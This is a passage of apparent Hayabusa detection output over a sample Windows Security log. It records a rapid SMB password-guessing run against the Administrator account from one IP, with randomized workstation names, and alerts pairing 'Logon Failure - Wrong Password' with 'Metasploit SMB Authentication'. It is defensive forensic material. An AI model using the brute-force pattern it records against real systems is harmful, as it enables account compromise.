NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
